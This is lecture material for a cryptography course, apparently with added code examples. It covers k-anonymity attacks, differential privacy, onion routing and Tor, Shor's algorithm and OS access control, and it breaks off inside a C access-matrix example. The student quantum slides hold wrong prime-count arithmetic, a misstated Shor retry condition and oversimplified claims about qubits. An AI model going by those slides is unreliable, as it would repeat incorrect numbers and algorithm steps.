Background Knowledge Attack: Carl (Zipcode 47673, Age 36) falls in the third equivalence class (Heart Disease, Cancer, Cancer).
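The checks behind the last three slides, as an added example (not code from the lecture): k-anonymity tested over the combination of quasi-identifiers rather than per attribute, the slides' generalization applied to the microdata table, and a per-class diversity report that flags the homogeneous class Bob falls into. All tables are constructed from the slides' values; `rec`, `generalize` and the function names are this example's own.

```python
# Added example (not from the lecture slides): k-anonymity over the COMBINATION
# of quasi-identifiers, the slides' generalization, and a homogeneity check.
# The tables are constructed from the values shown on the slides.
from collections import defaultdict

QID = ("Zipcode", "Age", "Sex")
SA = "Disease"


def equivalence_classes(rows, qid=QID):
    """Group records by their full QID tuple (the combination, not one column)."""
    classes = defaultdict(list)
    for row in rows:
        classes[tuple(row[a] for a in qid)].append(row)
    return classes


def k_anonymous(rows, k, qid=QID):
    """True iff every record shares its QID tuple with at least k-1 others."""
    return all(len(c) >= k for c in equivalence_classes(rows, qid).values())


def per_attribute_k(rows, k, qid=QID):
    """The flawed check from the 'This is wrong' slide: k-anonymity on each
    quasi-identifier separately. Passing it says nothing about the combination."""
    return all(k_anonymous(rows, k, (a,)) for a in qid)


def homogeneous_classes(rows, qid=QID, sa=SA):
    """Equivalence classes with a single distinct sensitive value, i.e. the
    classes exposed to the homogeneity attack."""
    return [key for key, recs in equivalence_classes(rows, qid).items()
            if len({r[sa] for r in recs}) == 1]


def generalize(row):
    """Generalization used on the slides: 4767x/4760x -> 476**, 4790x -> 4790*,
    age 2x -> 2*, age 43..52 -> [43,52], sex -> *."""
    g = dict(row)
    z, age = row["Zipcode"], row["Age"]
    g["Zipcode"] = z[:3] + "**" if z.startswith("476") else z[:4] + "*"
    g["Age"] = "2*" if 20 <= age < 30 else "[43,52]"
    g["Sex"] = "*"
    return g


def rec(zipcode, age, sex, disease):
    return {"Zipcode": zipcode, "Age": age, "Sex": sex, "Disease": disease}


# Microdata table from the slides (names dropped).
MICRODATA = [rec("47677", 29, "F", "Ovarian Cancer"), rec("47602", 22, "F", "Ovarian Cancer"),
             rec("47678", 27, "M", "Prostate Cancer"), rec("47905", 43, "M", "Flu"),
             rec("47909", 52, "F", "Heart Disease"), rec("47906", 47, "M", "Heart Disease")]

# The 'This is wrong' table: 3-anonymous per attribute, unique on the combination.
WRONG = [rec("476**", "2*", "F", "Ovarian Cancer"), rec("476**", "2*", "M", "Ovarian Cancer"),
         rec("476**", "3*", "F", "Prostate Cancer"), rec("479**", "3*", "M", "Flu"),
         rec("479**", "3*", "F", "Heart Disease"), rec("479**", "2*", "M", "Heart Disease")]

# The 3-anonymous patient table from the homogeneity-attack slide (QID = Zipcode, Age).
PATIENTS = ([rec("476**", "2*", "*", d) for d in ["Heart Disease"] * 3]
            + [rec("4790*", ">=40", "*", d) for d in ["Flu", "Heart Disease", "Cancer"]]
            + [rec("476**", "3*", "*", d) for d in ["Heart Disease", "Cancer", "Cancer"]])

if __name__ == "__main__":
    generalized = [generalize(r) for r in MICRODATA]
    print("microdata 3-anonymous?       ", k_anonymous(MICRODATA, 3))
    print("generalized 3-anonymous?     ", k_anonymous(generalized, 3))
    print("'wrong' table, per attribute:", per_attribute_k(WRONG, 3))
    print("'wrong' table, combination:  ", k_anonymous(WRONG, 3))
    print("homogeneous classes:         ", homogeneous_classes(PATIENTS, ("Zipcode", "Age")))
```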
k-Anonymity & Generalization
• Issue: still able to identify individuals in databases!
• Improved solutions of k-Anonymity tend to be ad hoc
• Differential Privacy
– A rigorous privacy notion

Differential Privacy (DP)
• A theoretical model
– Datasets D and D’ differ on at most one record
– M is a statistical query or a data mining algorithm

  M is ε-differentially private if Pr[M(D) = R] ≤ e^ε × Pr[M(D’) = R]

– Indistinguishable results whether you (or anyone) are in the dataset or not
– Smaller ε equals stronger privacy
Differential Privacy (DP)
Key idea: the released statistic is about the same if any individual's record is removed from the database.

Differential Privacy (DP)
• Question: why pairs of datasets that differ in one row?

Slido: Why pairs of datasets that differ in one row?

Differential Privacy (DP)
• Question: why pairs of datasets that differ in one row?
• Answer: simulate the presence or absence of a single record
Differential Privacy (DP)
• Algorithm:

Differential Privacy (DP)
• Example:
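An added example, not the algorithm or example figure from the slides: the two-query differencing attack from the Data Summarization slide, then the Laplace mechanism as one concrete ε-differentially private M, checked against the definition Pr[M(D) = R] ≤ e^ε × Pr[M(D’) = R] with D the company and D’ the company without the president. The company, salary cap and names are constructed; the Laplace mechanism is the standard one.

```python
# Added example (not from the lecture slides): the two-query differencing
# attack on exact statistics, then the Laplace mechanism as one concrete
# ε-differentially private M, checked against the slide's definition
#   Pr[M(D) = R] <= e^ε × Pr[M(D') = R]
# with D = the company and D' = the company without the president.
# Salaries, the cap and the names are constructed sample data.
import math
import random

# Salaries are clipped to [0, CAP], so adding or removing one record changes a
# SUM query by at most CAP: that is the query's sensitivity.
SALARY_CAP = 250_000

COMPANY = {"president": 240_000, "alice": 90_000, "bob": 85_000, "carol": 110_000}


def without(db, subject):
    """Neighbouring dataset D': db with one record removed."""
    return {k: v for k, v in db.items() if k != subject}


def sum_query(db):
    """Exact statistical query: total clipped salary of everyone in db."""
    return sum(min(max(v, 0), SALARY_CAP) for v in db.values())


def differencing_attack(db, target):
    """Two 'harmless' aggregates pin down one individual exactly."""
    return sum_query(db) - sum_query(without(db, target))


def laplace_noise(scale, rng):
    """Laplace(0, scale) via inverse CDF (random has no laplace sampler)."""
    u = max(rng.random() - 0.5, -0.5 + 1e-12)  # keep the log argument > 0
    return -scale * math.copysign(1.0, u) * math.log(1.0 - 2.0 * abs(u))


def laplace_mechanism(true_value, sensitivity, eps, rng):
    """M(D) = f(D) + Lap(sensitivity / ε): ε-differentially private release."""
    return true_value + laplace_noise(sensitivity / eps, rng)


def laplace_pdf(x, mu, scale):
    return math.exp(-abs(x - mu) / scale) / (2.0 * scale)


def max_privacy_loss(f_d, f_dprime, sensitivity, eps, outputs):
    """max over candidate outputs R of Pr[M(D) = R] / Pr[M(D') = R] (densities).
    For Laplace noise this equals exp(|f(D) - f(D')| / scale), which is <= e^ε
    exactly when |f(D) - f(D')| <= sensitivity."""
    scale = sensitivity / eps
    return max(laplace_pdf(r, f_d, scale) / laplace_pdf(r, f_dprime, scale)
               for r in outputs)


def satisfies_dp(db, target, eps, claimed_sensitivity=SALARY_CAP):
    """Does M with noise scale claimed_sensitivity/ε meet ε-DP for this D, D'?
    Under-estimating how much one record can move the sum (a too-small
    claimed sensitivity) makes the check fail."""
    f_d, f_dp = sum_query(db), sum_query(without(db, target))
    outputs = [f_dp + step * SALARY_CAP / 10 for step in range(-30, 31)]
    loss = max_privacy_loss(f_d, f_dp, claimed_sensitivity, eps, outputs)
    return loss <= math.exp(eps) + 1e-9


def noisy_differencing(db, target, eps, rng):
    """The same two queries answered by M: the attacker gets the target's
    salary plus the difference of two Laplace samples (std ≈ 1.41·CAP/ε)."""
    return (laplace_mechanism(sum_query(db), SALARY_CAP, eps, rng)
            - laplace_mechanism(sum_query(without(db, target)), SALARY_CAP, eps, rng))


if __name__ == "__main__":
    rng = random.Random(4520)
    print("exact differencing reveals:", differencing_attack(COMPANY, "president"))
    for eps in (0.1, 0.5, 1.0):
        print(f"eps={eps}: bound holds={satisfies_dp(COMPANY, 'president', eps)}, "
              f"noisy estimate={noisy_differencing(COMPANY, 'president', eps, rng):,.0f}")
```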
Differential Privacy (DP): Applications
• Google:
– Launched the first commercial use of DP in 2014.
– Applied it to study malware in Chrome without gathering private user information.
• Apple:
– Implements DP to collect data in iOS devices.
– Uses this data to improve features like keyboard suggestions, Spotlight search, and Notes.
– Collects trends in language and emoji use across users while maintaining individual privacy.
• Microsoft:
– Spearheaded the development of DP.
– Applied DP to telemetry data in Windows.
– Applied DP in LinkedIn for advertiser queries and suggesting replies within office-related contexts.

Statistical Database Privacy Protection
• We do not have a silver bullet
• Differential privacy is the state of the art
• It is far from perfect

Summary
• Security
– Encryption, e.g., DES, AES, RSA…
– Provides utility only to the key owner
• Privacy
– Data Obfuscation/Perturbation, e.g., k-anonymity, Differential Privacy
– Provides utility to the public
• Allow researchers to extract knowledge about data
Part 2. Network Anonymity

What is Privacy?
• Privacy as protecting the identity
– Statistical Database Privacy
• Remove identifiable information from data
– Network Anonymity
• Hide identity on the internet
Privacy on Public Networks
• The Internet is designed as a public network
– Wi-Fi access points and network routers see all traffic that passes through them
• Routing information is public
– IP packet headers identify source and destination
– Even a passive observer can easily figure out who is talking to whom
• Frequently visiting websites related to a specific health condition
• Constant exchange of data between two IP addresses might suggest a personal relationship
• Frequent requests to location-based services could indicate a person's whereabouts or routine

Why is Encryption not Enough?
• Encryption does not hide identities
– Encryption hides the payload/message, but not routing information. Headers are left exposed, both to the receiver and to an attacker.
– Even IP-level encryption (tunnel-mode IPsec/ESP) reveals the IP addresses of the IPsec gateways.
• These addresses can provide clues about the origin and destination of the data.

Internet Anonymity
• Unlinkability
– The adversary knows all the senders and receivers but cannot link senders to receivers
• Sender anonymity
• Receiver anonymity
Anonymity via Random Routing
• Hide message source through random routing
• Routers cannot definitively determine the origin/source of the message
– the true sender or another router

Random Routing
• Popular techniques:
– Chaum’s Mix (Chaum 1981)
• Correspondence hiding between sender & receiver by wrapping messages in layers and relaying through “mix” routers.
– Onion routing (Syverson et al. 1997)
• Layered encryption using pair-wise symmetric keys
– Crowds (Reiter et al. 1998)
• Probabilistic random walk with probability factor, hides initiator of traffic through multicast responses
– P5 (Sherwood et al. 2001)
• Dining cryptographer network
– Tarzan, MorphMix, Freedom, Tor, Cashmere, Salsa, …

Onion Routing
• The term "onion"
– refers to layers of encryption applied to data as it travels through the Onion Routing network.
– layers of an onion must be peeled away one by one to reveal the core
– the data is encrypted multiple times as it passes through different relays in the network, creating layers of encryption that are sequentially decrypted by each relay until the data reaches its final destination
Onion Routing
• The smart bit is using layered encryption so every node can only decrypt part of the message.

Onion Routing
[Reed, Syverson, Goldschlag 1997]
• Sender chooses a sequence of routers
– Some may be honest, some controlled by attacker
– Sender controls the length of the path

Route Establishment
• Routing info for each link encrypted with router's public key
• Each router learns only the identity of the next router
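The layered construction described on the Onion Routing slides, as an added example (not code from the lecture or from any onion-routing project): the sender shares a symmetric key with each of three relays and wraps the message so that each relay can peel exactly one layer and learns only the next hop. The cipher is a toy SHA-256 keystream XOR chosen so the example needs only the standard library; it is not a real cipher, and the relay names, keys, nonce and message are constructed.

```python
# Added example (not from the lecture slides): an onion built with pair-wise
# symmetric keys shared between the sender and each relay, peeled one layer
# per hop as the Onion Routing slides describe. The cipher is a toy SHA-256
# keystream XOR so the example needs only the standard library; it is NOT a
# real cipher. Relay names, keys, nonce and message are constructed.
import hashlib
import json


def toy_xor_cipher(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """XOR with a SHA-256 counter keystream; encrypt and decrypt are identical."""
    out = bytearray()
    for off in range(0, len(data), 32):
        block = hashlib.sha256(key + nonce + (off // 32).to_bytes(4, "big")).digest()
        out += bytes(d ^ k for d, k in zip(data[off:off + 32], block))
    return bytes(out)


def build_onion(path, keys, destination, payload, nonce):
    """Sender side. The innermost layer (for the exit relay) names the
    destination and carries the payload; each outer layer, encrypted for
    relay i, names only relay i+1 and carries relay i+1's layer."""
    layer = json.dumps({"next": destination, "data": payload.hex()}).encode()
    blob = toy_xor_cipher(keys[path[-1]], nonce, layer)
    for i in range(len(path) - 2, -1, -1):
        layer = json.dumps({"next": path[i + 1], "inner": blob.hex()}).encode()
        blob = toy_xor_cipher(keys[path[i]], nonce, layer)
    return blob  # handed to path[0]


def peel(key, nonce, blob):
    """Relay side: remove exactly one layer.
    Returns (next_hop, bytes_to_forward_or_None, payload_or_None)."""
    layer = json.loads(toy_xor_cipher(key, nonce, blob))
    if "data" in layer:
        return layer["next"], None, bytes.fromhex(layer["data"])
    return layer["next"], bytes.fromhex(layer["inner"]), None


def can_peel(key, nonce, blob):
    """A relay holding the wrong key gets keystream garbage, not a layer."""
    try:
        json.loads(toy_xor_cipher(key, nonce, blob))
        return True
    except ValueError:  # covers UnicodeDecodeError and JSONDecodeError
        return False


def run_circuit(path, keys, destination, payload, nonce):
    """Simulate the hops; record what each relay learns from its own layer."""
    blob = build_onion(path, keys, destination, payload, nonce)
    views = []
    for relay in path:
        nxt, forward, data = peel(keys[relay], nonce, blob)
        views.append({"relay": relay, "learns_next_hop": nxt, "sees_payload": data is not None})
        if data is not None:
            return views, nxt, data
        blob = forward
    raise RuntimeError("circuit ended without an exit layer")


# Constructed circuit: three relays, each with its own key shared with the sender.
PATH = ["R1", "R2", "R3"]
KEYS = {r: hashlib.sha256(b"constructed key for " + r.encode()).digest() for r in PATH}
NONCE = b"\x00" * 12  # fresh per onion in practice; fixed here for reproducibility

if __name__ == "__main__":
    views, dest, data = run_circuit(PATH, KEYS, "destination.example", b"hello, exit", NONCE)
    for v in views:
        print(v)
    print("delivered to", dest, ":", data)
    onion = build_onion(PATH, KEYS, "destination.example", b"hello, exit", NONCE)
    print("R2 can open R1's layer?", can_peel(KEYS["R2"], NONCE, onion))
```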
Tor: The Second-Generation Onion Router
(USENIX Security 2004)
R. Dingledine, N. Mathewson, P. Syverson

Tor
• Deployed onion routing network
– http://torproject.org
– Specifically designed for low-latency anonymous Internet communications
• Main goal
– Enhances network security and anonymity by making it difficult for anyone monitoring the network to trace the origin and destination of data
• Running since October 2003
– Thousands of relay nodes, 100K-500K? of users
• Easy-to-use client proxy, integrated Web browser

Why is Encryption not Enough?
• Encryption does not hide identities
– Encryption hides the payload, but not routing information. Headers are left exposed, both to the receiver and to an attacker.
• Tor protects against traffic analysis, e.g.,
• E-commerce price discrimination based on country.
• Some online retailers might vary prices of products or services based on the geographic location of the user.
• By using Tor, a user can mask their true location, making it more challenging for retailers to implement such price discrimination tactics.

Slides References
• The University of Texas at Austin CS 380S


Quantum Computing - A Threat to OG Cryptography
- Vaideeshwaran Saravanan

Contents
• Overview
• Cryptography and classical encryption
• Quantum computing
• Threat toward the cryptography
• Shor’s algorithm
• PQC
• Key takeaways

Overview
Traditional cryptography - Relies on mathematical problems that are difficult to solve using traditional computers
Quantum computing - Leveraging the concept of quantum for computation
Post quantum cryptography - A field of study focused on developing cryptographic algorithms resistant to attacks by quantum computers
The advent of powerful quantum computers poses a threat to current cryptography
Exploring the intersection of quantum computing and cryptography is important for future secure communication

Cryptography and classical encryption
Traditional cryptography algorithms
• Symmetric encryption --- AES [2]
• Asymmetric encryption -- RSA [3]

Approx. Prime Count: 10^100 / log(10^100) = 1.67x10^97

Prime numbers in 600 digits?
N = 600 (Number of Digits)
Largest Number: 10^600 (1 followed by 600 zeros)
Approx. Prime Count: 10^600 / log(10^600) = 1.67E597
Quantum computing
• Quantum computing - works on the principle of Quantum Mechanics - superposition and entanglement.
• Quantum computers work much faster than classical computers.

Properties of Quantum computing
Superposition [5]    Entanglement [6]

Bits vs Qubits

BITS
▪ Bits are the basic units of classical computing.
▪ A bit can represent either a 0 or a 1.
▪ Bits are processed sequentially, one at a time.
▪ Classical computers perform calculations by manipulating and processing bits using logic gates.
▪ The state of a bit is always definite and deterministic.

QUBITS
▪ Qubits are the basic units of quantum computing.
▪ A qubit can exist in a superposition of 0 and 1, meaning it can represent both states simultaneously.
▪ Qubits can process multiple possibilities in parallel, allowing for exponential computational power.
▪ Quantum computers perform calculations by manipulating and processing qubits using quantum gates.
▪ The state of a qubit is probabilistic and can only be determined upon measurement.
Threats toward the cryptography
• Quantum Computing Power: Break widely used cryptographic algorithms.
• Cryptographic Vulnerability: Rapidly solve the mathematical problems on which cryptography relies.
• Data Security Risks: Previously encrypted data becomes easy to decrypt.
• Quantum algorithms: Shor’s algorithm and Grover’s algorithm

Grover’s Algorithm
• Quantum search algorithm for an unstructured database
• If the database is given as f(x), and we have to find the x equal to y, then f(x==y) = 1 and f(x!=y) = 0.
• With this quantum algorithm, if a normal algorithm takes N steps over the range of x to find y, this algorithm takes only √N.

How is Grover’s a threat to AES?
Shor’s Algorithm - Demonstrate

Shor’s Algorithm
• Shor’s algorithm is a quantum algorithm
• Designed to factorize a large number made of 2 prime numbers.
• Leverages computational power and parallelism.

How Shor’s algorithm works?
• Let N be the number that needs to be factorized.
• Randomly generate a number g such that 1 < g < N and gcd(g, N) = 1
• Find p (period) such that f(x) = g^x (mod N) => f(x+p) = f(x)
• If p is odd and g^(p/2) + 1 = N, start again by guessing any other number
• The factors of N are going to be gcd(g^(p/2) ± 1, N)

Example
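The steps above carried through in code, as an added example (not the presenter's own): the period p is found by classical brute force in place of the quantum Fourier transform, and the attempt is restarted when p is odd or g^(p/2) ≡ -1 (mod N), since gcd(g^(p/2) ± 1, N) then yields only trivial factors. N = 15, 21 and 91 are constructed toy moduli; `shor_trace` is this example's name for the step-by-step view.

```python
# Added example (not from the slides): the classical skeleton of Shor's
# algorithm from the "How Shor's algorithm works" slide. The period p is found
# by brute force here instead of by the quantum Fourier transform, so this runs
# on a classical machine only for tiny N. The moduli below are constructed.
import math
import random


def find_period(g, n):
    """Smallest p > 0 with g^p ≡ 1 (mod N). Requires gcd(g, N) = 1.
    (This is the step a quantum computer performs in polynomial time.)"""
    x, p = g % n, 1
    while x != 1:
        x = (x * g) % n
        p += 1
    return p


def shor_attempt(g, n):
    """One attempt with a fixed guess g. Returns a factor pair or None when
    the guess must be retried (odd period, or g^(p/2) ≡ -1 mod N)."""
    d = math.gcd(g, n)
    if d != 1:                      # lucky guess: g already shares a factor
        return tuple(sorted((d, n // d)))
    p = find_period(g, n)
    if p % 2 == 1:                  # odd period: start again with another g
        return None
    half = pow(g, p // 2, n)
    if half == n - 1:               # g^(p/2) ≡ -1 (mod N): trivial factors only
        return None
    for f in (math.gcd(half - 1, n), math.gcd(half + 1, n)):
        if 1 < f < n:
            return tuple(sorted((f, n // f)))
    return None


def shor_factor(n, rng=None, max_tries=100):
    """Repeat random guesses g in (1, N) until an attempt succeeds."""
    rng = rng or random.Random(0)
    for _ in range(max_tries):
        result = shor_attempt(rng.randrange(2, n), n)
        if result:
            return result
    return None


def shor_trace(g, n):
    """The slide's steps for one guess, as a dict for a worked example."""
    p = find_period(g, n)
    half = pow(g, p // 2, n) if p % 2 == 0 else None
    return {"g": g, "period p": p, "g^(p/2) mod N": half,
            "gcd(g^(p/2)-1, N)": math.gcd(half - 1, n) if half else None,
            "gcd(g^(p/2)+1, N)": math.gcd(half + 1, n) if half else None,
            "factors": shor_attempt(g, n)}


if __name__ == "__main__":
    for g in (7, 14):               # 7 succeeds on N=15; 14 hits g^(p/2) ≡ -1
        print(shor_trace(g, 15))
    for n in (15, 21, 91):
        print(n, "=", shor_factor(n))
```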
Post-quantum Cryptography (PQC)
• PQC - research to develop cryptographic algorithms to secure against quantum attacks.
• Explores alternative mathematical problems and cryptographic techniques for resistance.

PQC vs Quantum Cryptography

PQC
• Focuses on algorithm design and analysis to develop new cryptographic algorithms resistant to attacks from quantum computers.
• Targets encryption, signature, and key exchange algorithms for replacement with post-quantum alternatives.
• Main concern is the resistance of cryptographic algorithms to attacks from quantum computers.
• Involves integrating new post-quantum algorithms into existing cryptographic systems.
• Existing examples are lattice-based, code-based, hash-based, and multivariate polynomial cryptography.

Quantum Cryptography
• Focuses on secure communication using quantum principles, specifically in the context of key distribution protocols.
• Focuses primarily on key distribution protocols and achieving better randomness through quantum.
• Main concern is providing security in real-time communication using quantum principles.
• Involves the physical implementation of quantum principles in communication systems.
• Existing examples are Quantum Key Distribution (QKD) and Quantum Random Number Generation (QRNG).

Key takeaways
• Cryptography is essential for securing sensitive information through encryption techniques.
• Quantum computing poses a significant threat to classical encryption algorithms.
• Shor's algorithm, a quantum algorithm, targets the factorization problem underlying asymmetric encryption schemes like RSA.
• Post-Quantum Cryptography (PQC) focuses on developing encryption algorithms resistant to quantum attacks.
• PQC solutions are crucial for long-term security in the post-quantum era.
• Transitioning to quantum-resistant algorithms is necessary to mitigate the risks of quantum computing.

Thank you
Questions?
References
1. https://www.techtarget.com/searchsecurity/definition/cryptography
2. https://www.techtarget.com/searchsecurity/definition/Advanced-Encryption-Standard
3. https://www.geeksforgeeks.org/rsa-full-form/
4. https://physics.stackexchange.com/questions/582737/has-it-been-practically-proven-that-quantum-superposition-exists-if-yes-how-d
5. https://news.fnal.gov/2021/04/new-computing-algorithms-expand-the-boundaries-of-a-quantum-future/
6. https://medium.com/@shivesrini2013/a-brief-intro-to-quantum-computing-693611da68f3
7. https://www.ssl2buy.com/wiki/symmetric-vs-asymmetric-encryption-what-are-differences
8. https://www.geeksforgeeks.org/difference-between-encryption-and-cryptography/
CIS 4520 Introduction to Cryptography
Operating System (OS) Security
Wenjing Zhang
[email protected]

Outline
• Introduction
• Levels of OS Protection
• Memory Protection
• Access Protection
• Access Control
• OS Attacks

OS Security: Introduction
Introduction
• Four components of a computer system

Introduction
• Computer System Structure: can be divided into four components
– Hardware - provides basic computing resources
• CPU, memory, I/O devices
– Operating system
• Controls and coordinates use of hardware among various applications and users
– Application programs
• define the ways in which the system resources are used to solve the computing problems of the users
• Word processors, compilers, web browsers, database systems, video games
– Users
• People, machines, other computers

Introduction
• What is an Operating System (OS)?
– A program that acts as an intermediary between a user of a computer and the computer hardware
• Operating System goals:
– Execute user programs and make solving user problems easier
– Make the computer system convenient to use
– Use the computer hardware in an efficient manner
Introduction
• OS: still software
– All software security vulnerabilities still apply
• OS must protect users from each other by enforcing:
– memory protection
• prevents unauthorized access to user data or code in memory
– file protection
• secures private files from unauthorized access
– general control and access to objects
• manages user rights for devices, apps, resources
– user authentication
• verifies the identity of users

Introduction
• The fundamental tradeoff of OS security
– operating systems trade off between:
– Sharing
– Protection
• sharing is desirable
• protection is difficult

Introduction
• Early History
– no OS
– programs entered directly in binary through switches
– user’s program only one on system
– user responsible for:
• loading dependent libraries, other tools
• scheduling time to use computer
– OS security?
Introduction
• Later
– machines very expensive
– people less expensive
– maximize use of machine
– allow many users
– led to the development of multitasking operating systems

Introduction
• OS protection – separation
– Physical separation, e.g. 1 user/printer
– Temporal separation
– Logical separation: user thinks own machine
– Cryptographic separation
– Combinations of these
• OS Security is about reconciling separation and sharing

OS Security: Levels of Protection

Levels of Protection
• no protection
• isolation
• share all or nothing
• share via access limitation
• share by capabilities
• limit use of an object
Levels of Protection
• No protection
– e.g. early versions of Windows
– some embedded environments
– designed for one user
– no need for isolation, access control, etc.

Uniprogramming w/o memory protection
• Simplest mode of operation for a computer
• Each application has the entire computer's resources
• One application runs at a time within a fixed range of physical memory addresses, the same range even after the system is restarted

Uniprogramming w/o memory protection
• Applications typically use the lower memory addresses
• An OS uses the higher memory addresses
• An application can address any physical memory location

  Physical memory:  000000 [ Application | Operating system ] ffffff
Levels of Protection
• Isolation
– processes unaware of other processes
– each process: own address space, files, etc.
– OS provides confinement
• ensure that each process stays within its assigned space and doesn't interfere with its neighbors
• Virtual machines

  Physical memory:  000000 [ Application 1 | Application 2 | Operating system ] ffffff

Levels of Protection
• Share all or nothing
– owner of object declares it:
– Public: available to all users
– Private: not available
– Subject – a user, process, … (something that is accessing resources)
– Object – a file, device, web page, … (a resource that can be accessed)

Levels of Protection
• Share via access limitation
– Resources/files are shared
– Who can access what?
– Access control lists (ACLs)
– Access control matrices
– Capabilities
• tokens or keys that grant certain privileges to a user or a process

Levels of Protection
• Limit use of an object
– Sophisticated, fine-grained access control
– Examples:
– can view a file, but can’t print
– given aggregate info from database, but not individual records
OS Security: Memory Protection

Memory Protection
• In a multi-user multi-task environment, what’s in the memory?
– OS, processes from different users
– Data (keys!) in plaintext!
• Memory management
– Fences
– Relocation
– Base/Bounds Registers
– Tagged Architecture
– Segmentation
– Paging
– Combined Paging with Segmentation

Memory Protection
• Fences: protect OS from user program
– confine users to one side of a boundary
– predefined memory address: user code on one side, OS on the other

  OS space
  ---- Fence ----
  User space

Memory Protection
• Fences: protect OS from user program
– Problem?
• fixed boundary too restrictive; doesn’t protect users from each other
– moveable fence: store fence location in register

Memory Protection
• Relocation
– programs written to run starting at address 0
– can be run at any address
– addresses in source are symbolic:
• e.g., numStudents
– compiler binds these to relocatable addresses.
• e.g. 20 bytes from beginning of module func
– then linker or loader binds to absolute addresses
• e.g. 20114
– logical addresses mapped to physical by Memory Management Unit (MMU)
– program never sees real addresses
Memory Protection
• We skip the details of segmentation and paging.
• They have been covered in your OS class.

Memory Protection
• Wrap-up
– Each process
• has its own address space
• thinks it’s the only process on machine
– MMU provides translation between process’s address space and physical space
– process cannot generate address not in its own space

OS Security: Access Protection
Access Protection
• Definition:
– Mechanisms within the operating system
– Builds on memory protection/isolation
– Control the level of access that code has to the system’s resources
– Distinguish between OS operations (kernel mode) and user applications (user mode)
– Ensures security and prevents unauthorized access
– Essential for maintaining system stability and integrity

Access Protection
• Kernel mode vs. User mode
– fundamental division of execution privileges in an operating system
– Kernel mode (full privileges):
• OS, drivers, trusted code
• Reference to full memory space
• Unrestricted access to all the resources
– User mode (limited privileges):
• Applications, some drivers
• No direct access to hardware outside allocated space
• Protection rings (x86 architecture)
– Ring 0: Kernel
– Ring 3: User

Access Protection
• Switching from Kernel mode to User mode
– To run a user program, the kernel:
– Creates a process and initializes the address space
– Loads the program into memory
– Initializes translation tables
– Sets the hardware pointer to the translation table
– Sets the CPU to user mode
– Jumps to the entry point of the program

Access Protection
• Switching from User mode to Kernel mode
• Voluntary
– System calls: a user process asks the OS to do something on the process’s behalf
• Involuntary
– Hardware interrupts (e.g., I/O)
– Program exceptions (e.g., segmentation fault)
Access Protection
• For all cases, hardware automatically performs the following steps
– Sets the CPU to kernel mode
– Saves the current program counter
– Jumps to the handler in the kernel
• The handler saves old register values

Access Protection
• Context switching between processes
– Need to save and restore pointers to translation tables
• To resume process execution
– Kernel reloads old register values
– Sets CPU to user mode
– Jumps to the old program counter

OS Security: Access Control
Control of Access to General Objects
• Control of any kind of object
• Examples:
– memory
– secondary storage
– hardware devices
– some data structure
– instructions
– passwords and user-authentication mechanism
– the protection mechanism itself

Control of Access to General Objects
• Goals in protecting objects
– check every access
• user permitted doesn’t mean always permitted
– enforce least privilege
• grant access to minimum set of objects required to complete a task
– verify acceptable usage
• stack: push(), pop(), …
• Shouldn’t be able to do anything else to stack

Control of Access to General Objects
• Directory
– not directory as in FS directory
– each user has a list (directory) of objects the user owns or has access to
– no user should be able to write to the directory
– for each file, directory contains list of permissions, e.g. R, W, X, and owner
CIS 4520
Introduction to
Cryptography
Control of Access to General Objects
Wenjing Zhang

39
CIS 4520
Introduction to
Cryptography
Control of Access to General Objects

• Directory
Wenjing Zhang

– simple *but*
– lists can get very long
• what about shared libraries, programs?
– same item in many lists
– revoking permissions?
• have to go through everyone’s lists

Control of Access to General Objects

• Access Control Lists (ACLs)
– maintain a list per object, not user
– use wildcards (*) to grant permission to a group
• e.g. administrator-*

Control of Access to General Objects

• Access Control Matrix
– row for each user
– column for each protected object
– simple lookups
– but probably lots of empty spaces
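The three representations above (per-user directory, per-object ACL, and the full matrix) as one small C program; this is an added illustration, not course code, and every user, object and right in it is constructed sample data. It shows the check-every-access lookup, the wildcard grant (administrator-*), and why revoking an object is one column sweep in the matrix but a search through every user's list with directories.

```c
#include <stdio.h>
#include <string.h>

/* Added illustration (not course code): the access-control matrix as a 2-D
 * array of permission bits; the ACL view (a column) and the directory view
 * (a row) are derived from it. Names and rights are constructed sample data. */
enum { PERM_R = 1, PERM_W = 2, PERM_X = 4 };
enum { NUSERS = 3, NOBJS = 4 };

static const char *const users[NUSERS]  = { "alice", "bob", "administrator-1" };
static const char *const objects[NOBJS] = { "passwd", "report.txt", "ls", "kernel.log" };

/* matrix[user][object]; a 0 entry is one of the "empty spaces" on the slide */
static unsigned char matrix[NUSERS][NOBJS] = {
    /* passwd           report.txt        ls                kernel.log */
    { 0,                PERM_R | PERM_W,  PERM_R | PERM_X,  0      }, /* alice */
    { 0,                PERM_R,           PERM_R | PERM_X,  0      }, /* bob */
    { PERM_R | PERM_W,  PERM_R,           PERM_R | PERM_X,  PERM_R }, /* administrator-1 */
};

static int index_of(const char *const *names, int n, const char *name) {
    for (int i = 0; i < n; i++)
        if (strcmp(names[i], name) == 0) return i;
    return -1;
}

/* "Check every access": 1 only if the user holds all of the requested bits on
 * the object; unknown names and missing bits both fail closed. */
int acm_check(const char *user, const char *object, unsigned char right) {
    int u = index_of(users, NUSERS, user), o = index_of(objects, NOBJS, object);
    if (u < 0 || o < 0) return 0;
    return (matrix[u][o] & right) == right;
}

/* ACL view: one column. Returns how many users hold any right on the object,
 * storing up to cap of their names in holders[] (holders may be NULL, cap 0). */
int acm_acl(const char *object, const char *holders[], int cap) {
    int o = index_of(objects, NOBJS, object), n = 0;
    if (o < 0) return 0;
    for (int u = 0; u < NUSERS; u++)
        if (matrix[u][o]) { if (n < cap) holders[n] = users[u]; n++; }
    return n;
}

/* Directory view: one row. Returns how many objects the user can reach at all,
 * storing up to cap of their names in objs[] (objs may be NULL, cap 0). */
int acm_directory(const char *user, const char *objs[], int cap) {
    int u = index_of(users, NUSERS, user), n = 0;
    if (u < 0) return 0;
    for (int o = 0; o < NOBJS; o++)
        if (matrix[u][o]) { if (n < cap) objs[n] = objects[o]; n++; }
    return n;
}

/* Wildcard grant such as "administrator-*": every user whose name starts with
 * the text before the '*' receives the right. Returns the number of grants. */
int acm_grant_wildcard(const char *pattern, const char *object, unsigned char right) {
    const char *star = strchr(pattern, '*');
    size_t prefix = star ? (size_t)(star - pattern) : strlen(pattern);
    int o = index_of(objects, NOBJS, object), granted = 0;
    if (o < 0) return 0;
    for (int u = 0; u < NUSERS; u++) {
        int match = star ? strncmp(users[u], pattern, prefix) == 0
                         : strcmp(users[u], pattern) == 0;
        if (match) { matrix[u][o] |= right; granted++; }
    }
    return granted;
}

/* Revoking an object clears one column: a single pass with the matrix or an
 * ACL per object, but with per-user directories every user's list would have
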